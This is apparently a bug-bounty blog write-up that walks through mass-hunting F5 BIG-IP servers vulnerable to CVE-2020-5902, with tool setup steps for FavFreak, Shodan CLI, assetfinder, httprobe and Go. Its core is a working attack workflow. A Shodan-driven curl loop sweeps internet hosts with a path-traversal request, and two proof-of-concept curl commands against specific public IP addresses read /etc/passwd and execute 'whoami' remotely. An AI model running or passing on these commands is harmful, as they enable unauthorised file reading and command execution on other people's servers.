CVE-2020–5902 Mass Hunting with shodan and Favfreak
Google Dork : inurl:/tmui/login.jsp
Hey Guys!! It’s me Anon Tuttu Venus again with another writeup! [Just second one :P]
I knew that this writeup is too late.
But still, I thought about noting down the process I did for finding CVE 2020–5902.
I have done these on my Kali Linux
!!!!!!!!!SPOILER ALERT!!!!!!!!!!
Main Content :
These are the 2 commands which we are going to use.
I will explain to you how to run these commands without an error.
Prerequisites :
Shodan Premium ID required [ API Key ]
Tool Need to be installed :
FavFreak is a new tool developed by Devansh batham
Writeup: https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
How to Setup Favfreak :
Original: https://github.com/devanshbatham/FavFreak
git clone https://github.com/devanshbatham/FavFreakcd FavFreakpip3 install -r requirements.txt
Shodan CLI is a command-line version on Shodan.io
How to install and configure?
- easy_install shodan
- shodan init YOUR_API_KEY
Original:https://cli.shodan.io/
Assetfinder is used to grab subdomain developed by @tomnomnom
How to set up assetfinder :
Use go get method, which is the easiest one
go get -u github.com/tomnomnom/assetfinder
httprobe take a list of domains and check for working http and https servers. developed by @tomnomnom
How to set up httprobe:
Use go get method, which is the easiest one
go get -u github.com/tomnomnom/httprobe
Once everything is installed please run the 1st command :
assetfinder -subs-only target.com | httprobe | python3 /root/Tools/FavFreak/favfreak.py -o output —-shodan
/root/Tools: This the directory where I have stored my tools [ This may differ in your case]
Breakdown Commands :
assetfinder -subs-only target.com will find the subdomain
httprobe will check for http and https services
— — shodan will list down the shodan dorks
Once the above command runs successfully we will get an output similar to this :
Now copy each has without [ ] and replace with <input hash> and run the 2nd command
shodan search http.favicon.hash:<input hash> --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
The out of this command will show whether the server is Vulnerable or Not
If the output says it is Vulnerable the ran the POC.
Either you the curl or directly load on the browser.
Curl Command:
curl -sk 'https://52.20.40.40/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'curl -sk 'https://35.226.53.127/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'
NOTE: There are chances of getting false positives!! && Higher Chance of getting DUPLICATE REPORT!!!!!
Happy Hunting !!
I have seen some people are struggling to set up go on LINUX Machine
Steps to set up GO :
- Download go from official website https://golang.org/dl/go1.14.4.linux-amd64.tar.gz
- cd /root/Download [ Assuming this is your download location ]
- tar -C /usr/local/ -xvf go1.14.4.linux-amd64.tar.gz
- vim ~/.bashrc
- export GOPATH=/root/go-workspace
export GOROOT=/usr/local/go
PATH=$PATH:$GOROOT/bin/:$GOPATH/bin - source ~/.bashrc